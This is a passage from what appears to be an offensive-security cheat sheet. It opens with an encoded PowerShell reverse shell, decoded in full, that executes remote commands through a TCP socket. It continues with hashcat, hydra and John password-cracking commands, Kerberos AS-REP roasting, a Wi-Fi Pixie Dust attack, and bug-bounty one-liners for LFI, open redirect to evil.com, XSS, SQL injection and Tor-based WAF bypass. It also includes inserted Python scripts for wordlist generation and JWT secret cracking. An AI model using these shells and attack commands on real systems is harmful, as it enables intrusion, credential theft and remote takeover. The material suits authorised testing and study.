bgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBP
AGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4A
QQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0
AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQA
ZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBu
AGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsA
IAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAg
AD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcA
ZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBX
AHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwA
ZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBl
AG4AdAAuAEMAbABvAHMAZQAoACkA
```

Decoding it back (note that the output is still UTF-16LE, so bytes between the characters are NULs):

```
echo \
"JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAPABoAG8AcwB0AD4AIgAsADQANAA0ADUAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" | base64 --decode $client = New-Object System.Net.Sockets.TCPClient("",4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ## 5. 
Password Cracking **[`^ back to top ^`](#overview)** ### 5.1 Useful Websites **[`^ back to top ^`](#overview)** * [gchq.github.io/CyberChef](https://gchq.github.io/CyberChef) – the cyber Swiss army knife. * [crackstation.net](https://crackstation.net) – massive password hash cracker. * [onlinehashcrack.com](https://onlinehashcrack.com) – online hash cracking service. * [hashkiller.io/listmanager](https://hashkiller.io/listmanager) – has many other tools. * [hashes.com/en/decrypt/hash](https://hashes.com/en/decrypt/hash) – has many other tools. * [weakpass.com/wordlist](https://weakpass.com/wordlist) – lots of password dumps. * [packetstormsecurity.com/Crackers/wordlists](https://packetstormsecurity.com/Crackers/wordlists) – various wordlists and dictionaries. * [hashcat](https://hashcat.net) – world's fastest password cracker. * [hashcat example hashes](https://hashcat.net/wiki/doku.php?id=example_hashes) – identify hash types. * [hivesystems.io/blog/are-your-passwords-in-the-green](https://hivesystems.io/blog/are-your-passwords-in-the-green) – password cracking time table. ### crunch **[`^ back to top ^`](#overview)** Generate a lower-alpha-numeric wordlist: ``` crunch 4 6 -f /usr/share/crunch/charset.lst lalpha-numeric -o crunch_wordlist.txt ``` See the list of all available charsets or add your own in `charset.lst` located at `/usr/share/crunch/` directory. 
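crunch's `-t` pattern place-holders are `@` (lower-case), `,` (upper-case), `%` (digits) and `^` (symbols); `-d K<placeholder>` rejects candidates containing more than K consecutive identical characters of that class, and `-l` marks positions of the pattern to keep literal. The following is an added example, not crunch's code and not part of the original page: a small Python reimplementation of that expansion, handy for inspecting and counting what a pattern produces before a cracker is pointed at it. The symbol class is assumed to be Python's `string.punctuation`, which is not identical to crunch's `charset.lst`.

```python
"""Expand a crunch-style -t pattern (with -d duplicate limits and -l literals).

Added example; this is not crunch's code and is not part of the original page. It
reproduces the semantics of `crunch N N -t PATTERN [-d K<placeholder>] [-l MASK]` for
the four placeholders so a pattern can be inspected and counted before running a
cracker. The '^' symbol class is assumed to be string.punctuation, which differs
slightly from crunch's charset.lst."""
import itertools
import string
from typing import Dict, Iterator, Optional

PLACEHOLDERS = {
    "@": string.ascii_lowercase,   # lower case characters
    ",": string.ascii_uppercase,   # upper case characters
    "%": string.digits,            # numbers
    "^": string.punctuation,       # symbols (assumption, see docstring)
}


def _within_limits(candidate: str, limits: Dict[str, int]) -> bool:
    """-d K<placeholder>: reject runs of more than K identical characters of that class."""
    run = 1
    for prev, cur in zip(candidate, candidate[1:]):
        run = run + 1 if cur == prev else 1
        for placeholder, limit in limits.items():
            if run > limit and cur in PLACEHOLDERS[placeholder]:
                return False
    return True


def expand(pattern: str, limits: Optional[Dict[str, int]] = None, literal: str = "") -> Iterator[str]:
    """Yield every candidate for the pattern.

    `literal` mirrors crunch's -l: a string as long as the pattern in which a
    placeholder character marks a position whose pattern character is taken literally,
    so expand("@dmin%", literal="@aaaaa") keeps the leading '@' and only varies the digit."""
    limits = limits or {}
    pools = []
    for i, ch in enumerate(pattern):
        is_literal = i < len(literal) and literal[i] in PLACEHOLDERS
        pools.append(PLACEHOLDERS[ch] if ch in PLACEHOLDERS and not is_literal else ch)
    for combo in itertools.product(*pools):
        candidate = "".join(combo)
        if _within_limits(candidate, limits):
            yield candidate


def count(pattern: str, limits: Optional[Dict[str, int]] = None, literal: str = "") -> int:
    """Number of candidates a pattern produces; a cheap sanity check before cracking."""
    return sum(1 for _ in expand(pattern, limits, literal))


if __name__ == "__main__":
    # crunch 7 7 -t admin%% -d 1%  ->  90 candidates (00, 11, ..., 99 are dropped)
    print(count("admin%%", {"%": 1}))
    with open("crunch_wordlist.txt", "w") as out:
        out.writelines(f"{word}\n" for word in expand("admin%%^", {"%": 2, "^": 1}))
```

hashcat masks (`?l?u?d?s`, see the charset table further down) are the same idea with different placeholder names; the `count` function is the quickest way to see why a pattern such as `admin%%%^^` is feasible while a full `?a?a?a?a?a?a?a?a` is not.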
Generate all the possible permutations from words:

```
crunch -o crunch_wordlist.txt -p admin 123 \!\"
crunch -o crunch_wordlist.txt -q words.txt
```

Generate all the possible combinations from a charset:

| Option | Description |
| --- | --- |
| -d | Limits the number of consecutive identical characters |
| -f | Specifies a character set from a file |
| -i | Inverts the output |
| -l | When you use the -t option this option tells crunch which symbols should be treated as literals |
| -o | Specifies the file to write the output to |
| -p | Tells crunch to generate/permute words that don't have repeating characters |
| -r | Tells crunch to resume generating words from where it left off, -r only works if you use -o |
| -s | Specifies a starting string |
| -t | Specifies a pattern |

| Placeholder | Description |
| --- | --- |
| \@ | Lower case characters |
| \, | Upper case characters |
| \% | Numbers |
| \^ | Symbols |

**Unfortunately, there is no placeholder ranging from lowercase-alpha to symbols.**

Generate all the possible combinations from a placeholder:

```
crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^
crunch 10 10 -o crunch_wordlist.txt -t admin%%%^^ -d 2% -d 1^
crunch 10 10 + + 123456 \!\" -o crunch_wordlist.txt -t admin@@%^^
crunch 10 10 -o crunch_wordlist.txt -t @dmin@@%^^ -l @aaaaaaaaa
```

### hash-identifier

**[`^ back to top ^`](#overview)**

To identify a hash type, run the following tool:

```
hash-identifier
```

### Hashcat

**[`^ back to top ^`](#overview)**

Identify a hash:

```
hashcat --identify hash.txt
```

Crack a sha512crypt (`$6$`) hash with a dictionary:

```
hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
```

Example output:

```
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#
```

Brute force MD5 hashes (no mask given, so hashcat uses its built-in default mask):

```
hashcat -m 0 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt
```

Brute force NetNTLMv1 hashes:

```
hashcat -m 5500 -a 3 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt
```

Use `--session=` to save, and continue your cracking progress later using `--restore`. Continue cracking progress:

```
hashcat --session=cracking --restore
```

| Option | Description |
| --- | --- |
| -m | Hash-type, see references below |
| -a | Attack-mode, see references below |
| --force | Ignore warnings |
| --runtime | Abort session after X seconds of runtime |
| --status | Enable automatic update of the status screen |
| -o | Define outfile for recovered hash |
| --session | Define specific session name |
| --restore | Restore session from --session |
| --restore-file-path | Specific path to restore file |
| -O | Enable optimized kernels (limits password length) |
| -1 | User-defined charset ?1 |
| -2 | User-defined charset ?2 |
| -3 | User-defined charset ?3 |
| -4 | User-defined charset ?4 |

**When specifying a user-defined charset, escape `?` with another `?` (i.e., use `??` instead of `\?`).**

| Hash Type | Description |
| --- | --- |
| 0 | MD5 |
| 100 | SHA1 |
| 1400 | SHA256 |
| 1700 | SHA512 |
| 200 | MySQL323 |
| 300 | MySQL4.1/MySQL5 |
| 1000 | NTLM |
| 5500 | NetNTLMv1-VANILLA / NetNTLMv1-ESS |
| 5600 | NetNTLMv2 |
| 2500 | WPA/WPA2 (deprecated in hashcat 6; use 22000 with a hcxpcapngtool capture) |
| 16800 | WPA-PMKID-PBKDF2 (deprecated in hashcat 6; use 22000) |
| 16500 | JWT (JSON Web Token) |

**For more hash types read the manual.**

| Attack Mode | Name |
| --- | --- |
| 0 | Straight |
| 1 | Combination |
| 3 | Brute Force |
| 6 | Hybrid Wordlist + Mask |
| 7 | Hybrid Mask + Wordlist |
| 9 | Association |

| Charset | Description |
| --- | --- |
| \?l | abcdefghijklmnopqrstuvwxyz |
| \?u | ABCDEFGHIJKLMNOPQRSTUVWXYZ |
| \?d | 0123456789 |
| \?s | \!\"\#\$\%\&\'\(\)\*\+\,\-\.\/\:\;\<\=\>\?\@\^\_\`\{\|\}\~ |
| \?a | \?l\?u\?d\?s |
| \?b | 0x00 - 0xff |

Dictionary attack:

```
hashcat -m 100 -a 0 --session=cracking --force --status -O B1B3773A05C0ED0176787A4F1574FF0075F7521E rockyou.txt
hashcat -m 5600 -a 0 --session=cracking --force --status -O -o hashcat_results.txt hashes.txt rockyou.txt
```

You can find the `rockyou.txt` wordlist in
[SecLists](https://github.com/danielmiessler/SecLists).

Brute force a hash using a placeholder:

```
hashcat -m 0 -a 3 --session=cracking --force --status -O cc158fa2f16206c8bd2c750002536211 -1 ?l?u -2 ?d?s ?1?l?l?l?l?l?2?2
hashcat -m 0 -a 3 --session=cracking --force --status -O 85fb9a30572c42b19f36d215722e1780 -1 \!\"\#\$\%\&\/\(\)\=??\* -2 ?d?1 ?u?l?l?l?l?2?2?2
```

hashcat in mask mode, e.g. for a password built from the template `{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}` (add `-i` to increment the mask if the number may have fewer than nine digits):

```
nano hash.txt
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
hashcat -m 1400 hash.txt -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
```

hashcat with kerbrute (AS-REP roasting: enumerate users, request the AS-REP of an account without pre-authentication, crack it with mode 18200):

```
./kerbrute userenum --dc -d spookysec.local userlist.txt -t 100
GetNPUsers.py spookysec.local/svc-admin -request -no-pass -dc-ip
hashcat --force -m 18200 -a 0 svc-admin.hash /usr/share/wordlists/rockyou.txt
```

### Cracking the JWT

**[`^ back to top ^`](#overview)**

Mask (brute-force) attack on an HS256-signed token; for a dictionary attack use `-a 0` and a wordlist instead:

```
hashcat -m 16500 -a 3 --session=cracking --force --status -O eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds
```

You can also check the JWT cracking tool in the project at [ivan-sincek/jwt-bf](https://github.com/ivan-sincek/jwt-bf).

### Hydra

**[`^ back to top ^`](#overview)**

Dictionary attack on an HTTP POST login web form:

```
hydra -o hydra_results.txt -l admin -P rockyou.txt somesite.com http-post-form '/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed!'
```

When brute forcing a login web form, the string after the last `:` (here `Login failed!`) is the failure condition hydra uses to distinguish successful from failed login attempts; `Login=Login` is just the submit button's form field and must match the form. Change the `username` and `password` request parameter names as necessary.
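Returning to the JWT cracking above: hashcat mode 16500 is an HMAC-SHA256 brute force, and the following added example (not the page's or jwt-bf's code) does the same thing in Python so the mechanics are visible. A JWT is `base64url(header).base64url(payload).base64url(HMAC-SHA256(secret, "header.payload"))`, so every candidate secret is tried by recomputing the MAC over the first two segments as they appear in the token and comparing it with the third. The token is the one from the page; the wordlist is a constructed five-entry list, and `sign_hs256` builds a test token with a known secret so the attack can be checked end to end.

```python
"""Offline dictionary attack on an HS256-signed JWT (what hashcat -m 16500 does).

Added example, not part of the original page. The signing input is the token's own
first two segments, byte for byte, so JSON whitespace or key order in the header
and payload never has to be guessed."""
import base64
import hashlib
import hmac
import json
from typing import Iterable, Iterator, Optional

# Token from the page: {"alg":"HS256","typ":"JWT"} . {"name":"John Doe"} . signature
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJuYW1lIjoiSm9obiBEb2UifQ."
              "xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds")

# Constructed mini wordlist; in practice stream rockyou.txt with wordlist().
DEMO_WORDLIST = ["password", "123456", "secret", "qwerty", "letmein"]


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Build a token the way a server would; used here to create a known test target."""
    head = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    mac = hmac.new(secret, f"{head}.{body}".encode("ascii"), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url_encode(mac)}"


def wordlist(path: str) -> Iterator[str]:
    """Stream candidates from a file such as rockyou.txt (not loaded into memory)."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        for line in fh:
            yield line.rstrip("\r\n")


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the secret that reproduces the token's signature, or None if none does."""
    head, body, sig = token.split(".")
    alg = json.loads(b64url_decode(head)).get("alg")
    if alg != "HS256":
        # RS256/ES256 signatures are made with a private key; there is no shared
        # secret to find, and "none" tokens need no cracking at all.
        raise ValueError(f"not an HS256 token (alg={alg!r})")
    signing_input = f"{head}.{body}".encode("ascii")
    target = b64url_decode(sig)
    for secret in candidates:
        mac = hmac.new(secret.encode("utf-8"), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return secret
    return None


if __name__ == "__main__":
    print("page token secret:", crack_hs256(PAGE_TOKEN, DEMO_WORDLIST))
    demo = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"name": "John Doe"}, b"qwerty")
    print("demo token secret:", crack_hs256(demo, DEMO_WORDLIST))
    # Real run: crack_hs256(PAGE_TOKEN, wordlist("/usr/share/wordlists/rockyou.txt"))
```

The `alg` check is the important edge case: hashcat 16500 will happily grind through a wordlist against an RS256 token and never succeed, because the third segment is an RSA signature rather than an HMAC. In Python a wordlist the size of rockyou.txt takes minutes; hashcat on a GPU does the same in seconds, which is why the example exists to explain the attack rather than to replace the tool.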
Dictionary attack on a Secure Shell (SSH) login:

```
hydra -o hydra_results.txt -L users.txt -P rockyou.txt 192.168.8.5 ssh
```

You can find a bunch of useful wordlists in [SecLists](#wordlists).

| Option | Description |
| --- | --- |
| -R | Restore a previous aborted/crashed session |
| -S | Perform an SSL connect |
| -O | Use old SSL v2 and v3 |
| -s | If the service is on a different default port, define it here |
| -l | Login with the given login name |
| -L | Load several logins from a file |
| -p | Login with the given password |
| -P | Load several passwords from a file |
| -x | Password brute force generation (MIN:MAX:CHARSET), type "-x -h" to get help |
| -y | Disable the use of symbols in brute force |
| -e | Try "n" null password, "s" login as password and/or "r" reversed login |
| -o | Write found login/password pairs to a file instead of stdout |
| -f/-F | Exit when a login/password pair is found (-f per host, -F global) |
| -M | List of servers to attack, one entry per line, ':' to specify port |

| Supported services |
| --- |
| ftps |
| https-{get\|post}-form |
| mysql |
| smb |
| smtps |
| snmp |
| ssh |
| telnets |
| vnc |

For more supported services read the manual.

| Brute Force Syntax | Description |
| --- | --- |
| MIN | Minimum number of characters in the password |
| MAX | Maximum number of characters in the password |
| CHARSET | Charset values: "a" for lower-case letters, "A" for upper-case letters, "1" for numbers, and for all others just add their real representation |

FTP brute force example:

```
hydra -o hydra_results.txt -l admin -x 4:4:aA1\!\"\#\$\% 192.168.8.5 ftp
```

Some examples:

```
hydra -l -P http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V -F -u
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV ftp
hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV ssh
hydra -l milesdyson -P /usr/share/wordlists/rockyou.txt -vV smb
hydra -t 16 -L users.txt -p PASSWORD -vV ssh
```

### John the Ripper

**[`^ back to top ^`](#overview)**

Cracking examples:

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=raw-sha256
```

### Password Spraying

**[`^ back to top ^`](#overview)**

## 6. Wi-Fi

**[`^ back to top ^`](#overview)**

### Pixie Dust

**[`^ back to top ^`](#overview)**

Scan for available access points:

```
iwlist scanning
```

Pixie Dust attack against a given BSSID with [oneshot](https://github.com/nikita-yfh/OneShot-C):

```
./oneshot -i wlan0 -K --bssid 02:00:00:00:01:00
```

Write the `SSID` and `PSK` values to `config` with `wpa_passphrase`:

```
wpa_passphrase ACCESS_POINT_SSID 'PASSWORD' > config
```

Connect to the Wi-Fi via `wpa_supplicant`:

```
wpa_supplicant -B -c config -i wlan0
```

Set a static IP on the `wlan0` interface:

```
ifconfig wlan0 192.168.1.7 netmask 255.255.255.0
ifconfig
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.7  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::ff:fe00:800  prefixlen 64  scopeid 0x20<link>
        ether 02:00:00:00:08:00  txqueuelen 1000  (Ethernet)
        RX packets 2  bytes 282 (282.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10  bytes 1084 (1.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
```

Or connect to the Wi-Fi another way. Configuration file `/etc/wpa_supplicant/wpa_supplicant-wlan0.conf`:

```
ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
update_config=1

network={
    ssid="ACCESS_POINT_SSID"
    psk="PASSWORD"
    key_mgmt=WPA-PSK
    proto=WPA2
    pairwise=CCMP TKIP
    group=CCMP TKIP
    scan_ssid=1
}
```

Configuration file `/etc/systemd/network/25-wlan.network`:

```
[Match]
Name=wlan0

[Network]
DHCP=ipv4
```

Run:

```
systemctl enable wpa_supplicant@wlan0.service
systemctl restart systemd-networkd.service
systemctl restart wpa_supplicant@wlan0.service
```

Find live IP addresses on the `wlan0` network:

```
for i in `seq 1 255`; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done
```

## 7. One-Liners for Bug Bounty

**[`^ back to top ^`](#overview)**

**One-line recon with the pd (ProjectDiscovery) tools:**

```
subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports.txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt
```

**Subdomain enumeration:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d ' ' -f1 | grep --color 'api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn'

## from BufferOver.run
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u

## from Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from RedHunt Labs Recon API
curl --request GET --url 'https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=&page_size=1000' --header 'X-BLOBR-KEY: API_KEY' | jq '.subdomains[]' -r

## from nmap
nmap --script hostmap-crtsh.nse target.com

## from CertSpotter
curl -s "https://api.certspotter.com/v1/issuances?domain=target.com&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from Archive
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u

## from JLDC
curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u

## from crt.sh
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u

## from ThreatMiner
curl -s \
"https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u ## from Anubis curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com" ## from ThreatCrowd curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com" ## from HackerTarget curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" ## from AlienVault curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u ## from Censys censys subdomains target.com ## from subdomain center curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -u ``` **LFI:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" ``` **开放重定向:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done ``` ``` cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain' ``` ``` echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` **SSRF:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr ``` **XSS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` file=$1; key="API_KEY"; while read line; do 
curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file
```

```
cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "" | httpx -silent -nc -mc 200 -mr ""
```

```
cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe
```

```
echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' | qsreplace '">' | while read host; do curl -s --path-as-is --insecure "$host" | grep -qs "" && echo -e "$host \033[0;31m Vulnerable"; done
```

```
cat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht
```

```
cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 xsstrike.py -u @ --crawl'
```

```
echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '">' | freq
```

**Hidden directories:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt
```

```
ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json
```

**Search for sensitive files from Wayback:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
echo target.com | (gau || hakrawler || waybackurls || katana) | grep --color -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar"
```

**SQLi:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
cat subs.txt | (gau || hakrawler || katana || waybackurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs && for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done
```

```
findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1
```

**Bypass WAF using TOR:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment
```

